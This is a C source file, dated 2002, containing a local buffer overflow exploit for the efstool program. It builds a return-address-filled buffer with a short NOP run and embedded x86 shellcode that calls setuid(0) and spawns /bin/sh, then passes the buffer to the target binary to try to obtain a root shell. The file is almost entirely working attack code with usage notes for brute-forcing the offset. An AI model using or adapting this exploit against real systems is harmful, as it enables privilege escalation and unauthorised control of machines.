/* efstool.c - efstool/bof simple overflow in efstool, 
 *
 *
 * This code is published propterty of CloudAss, you may
 * duplicate this in any shape or form without prior written
 * permission from CloudAss.
 *
 * Bug discovered by ntfx, just figured I'd code a decent
 * exploit for it.
 *
 *
 * DISCLAIMER - I am in no way affiliated with ntfx or any members of 
 * soldierx or legion2002 security.
 *
 * Usage: ./efsroot offset - bruteforce if neccesary
 *
 * Bug is pretty stupid, and simple, I have yet to see it give root.
 * efstool is not +s on slackware 8.0 , it should spawn a shell
 * regardless.
 * 
 * (C) COPYRIGHT CloudAss , 2002
 * all rights reserved
 ***********************************************************************
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define SIZE 3000			
#define NOP 0x90		
#define PATH "/opt/gnome/bin/efstool"	

//--------------------------------------------------
long get_esp(void){ __asm__("movl %esp,%eax\n");}
//--------------------------------------------------

char shellcode[]=
   "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" 
   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
   "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[]) {
	char buffer[SIZE];
	long retaddr, offset;
	int i;

	offset = atoi(argv[1]);
	retaddr = get_esp() + offset;

	for(i=0; i < SIZE; i+=4)
	 	*(long *)&buffer[i] = retaddr;

	for(i=0; i < strlen(shellcode); i++)
		*(buffer+i) = NOP;

	memcpy(buffer+i, shellcode, strlen(shellcode));
	execl(PATH, "efstool", buffer, 0);
	return 0;
}